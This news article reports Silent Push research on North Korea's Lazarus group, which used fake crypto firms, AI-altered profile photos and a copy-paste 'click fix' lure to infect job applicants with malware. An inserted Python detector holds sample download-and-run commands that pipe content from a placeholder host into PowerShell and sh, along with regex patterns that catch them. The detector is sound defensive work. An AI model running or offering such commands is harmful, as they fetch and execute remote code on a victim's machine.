North Korean hackers used fake crypto firms to deliver malware in job scams


A North Korean state-sponsored hacking group, Lazarus, is advancing its tactics with a more polished and deceptive approach.

A report by cybersecurity firm Silent Push revealed that the group has set up fake US-based crypto companies to distribute malware disguised as job opportunities.

According to the report, a Lazarus subgroup called “Contagious Interview” is behind the registration of three fraudulent crypto consulting firms: BlockNovas LLC, Angeloper Agency, and SoftGlide LLC.

The intelligence firm stated that the three companies were created to look like legitimate players in the blockchain industry. However, these shell firms were used to lure developers into fake job interviews.

Zach Edwards, a senior threat analyst at Silent Push, pointed out that this isn’t the first time Lazarus has used job interview lures, but it’s the most advanced version seen so far.

He said:

“They have now crossed the Rubicon – they are willing to register a fake business and go through all the expected KYC checks involved with that process, and were successful in the effort.”

Malware disguised as interview tools

The fake interview process typically involves a request for an introductory video. When applicants try to upload the video, they encounter an error. They’re then given a quick-fix solution of a copy-and-paste command that secretly delivers malware.

Edwards said:

“During the job application process an error message is displayed as someone tries to record an introduction video and the ‘solution’ is an easy ‘click fix’ copy and paste trick, which leads to malware if the unsuspecting developer completes the process.”
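The ‘click fix’ lure described above ends with the victim pasting a command into a shell, so the earliest host-side signal a defender can look for is a script interpreter launched from an interactive session with a command line that fetches remote content and executes it in one step. The Python detector below is an added example, not part of the original article or of Silent Push’s research: it applies that heuristic to constructed process-creation events. The event schema, the sample values (including the example.invalid host) and the regular expressions are assumptions for illustration, not indicators taken from the report.

```python
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Optional

# Constructed sample process-creation events (assumed schema; not from the report).
SAMPLE_EVENTS = [
    {"ts": "2025-04-24T10:01:02Z", "parent": "chrome.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe --type=renderer"},
    {"ts": "2025-04-24T10:01:40Z", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "irm http://example.invalid/fix.ps1 | iex"'},
    {"ts": "2025-04-24T10:05:00Z", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -c Get-Date"},
    {"ts": "2025-04-24T10:06:00Z", "parent": "gnome-terminal", "image": "bash",
     "cmdline": "bash -c 'curl -fsSL http://example.invalid/fix.sh | sh'"},
    {"ts": "2025-04-24T10:07:00Z", "parent": "gnome-terminal", "image": "bash",
     "cmdline": "bash -c 'curl -fsSL https://example.invalid/readme.txt -o readme.txt'"},
]

# Interpreters a pasted one-liner would run in (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh", "zsh"}

# A single heuristic is weak evidence on its own; the detector requires a remote
# fetch *and* an execution sink in the same command line before it flags anything.
FETCH = re.compile(r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|curl|wget)\b", re.I)
EXEC_SINK = re.compile(r"(\|\s*(iex|invoke-expression|sh|bash|zsh)\b|\b(iex|invoke-expression)\s*\()", re.I)
STEALTH_FLAG = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-enc(odedcommand)?\b", re.I)


@dataclass
class Finding:
    ts: str
    cmdline: str
    reasons: List[str] = field(default_factory=list)


def score_event(ev: dict) -> Optional[Finding]:
    """Return a Finding when an interpreter runs a fetch-and-execute one-liner."""
    if ev.get("image", "").lower() not in INTERPRETERS:
        return None
    cmd = ev.get("cmdline", "")
    reasons = []
    if FETCH.search(cmd):
        reasons.append("remote fetch")
    if EXEC_SINK.search(cmd):
        reasons.append("piped into interpreter")
    if STEALTH_FLAG.search(cmd):
        reasons.append("stealth flag")
    # Download-and-run needs both halves; stealth flags alone are common in admin scripts.
    if "remote fetch" in reasons and "piped into interpreter" in reasons:
        return Finding(ev["ts"], cmd, reasons)
    return None


def scan(events: Iterable[dict]) -> List[Finding]:
    """Apply score_event to every event and keep only the flagged ones."""
    return [f for f in (score_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.ts, "|", ", ".join(f.reasons), "|", f.cmdline)
```

In the sample, the PowerShell event and the `curl | sh` event are flagged while the plain `curl -o` download and the `Get-Date` command are not; in practice the same logic would be fed from an EDR or Sysmon process-creation stream, and a parent process that is a browser or a terminal opened moments after browser activity would raise the priority of the finding.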

Silent Push identified three distinct malware strains used in this campaign: BeaverTail, InvisibleFerret, and OtterCookie. These tools give hackers remote access to victims’ devices and allow them to extract sensitive information.

The attackers use services like Astrill VPN and residential proxies to cover their tracks, making their infrastructure hard to trace.

AI-generated identities

Beyond malware, the North Korean attackers rely heavily on fake AI personas to carry out their nefarious activities.

Silent Push found that the threat actors use AI tools like Remaker AI to create fake employee photos. Sometimes, they even alter real images to create deceptive profiles that look almost authentic.

Edwards said:

“There are many fake employees and stolen images from real people being used across this network…In one of the [cases], the threat actors took a real photo from a real person, and then appeared to have run it through an ‘AI image modifier tool’ to create a subtly different version of that same image.”

This development marks a dangerous evolution in cybercrime targeting the crypto space. The combination of malware, social engineering, and AI-generated identities signals a growing threat.

Edwards concluded:

“This research is a perfect example of what happens when threat actors continue to uplevel their efforts one campaign after the next, without facing justice.”

The post North Korean hackers used fake crypto firms to deliver malware in job scams appeared first on CryptoSlate.
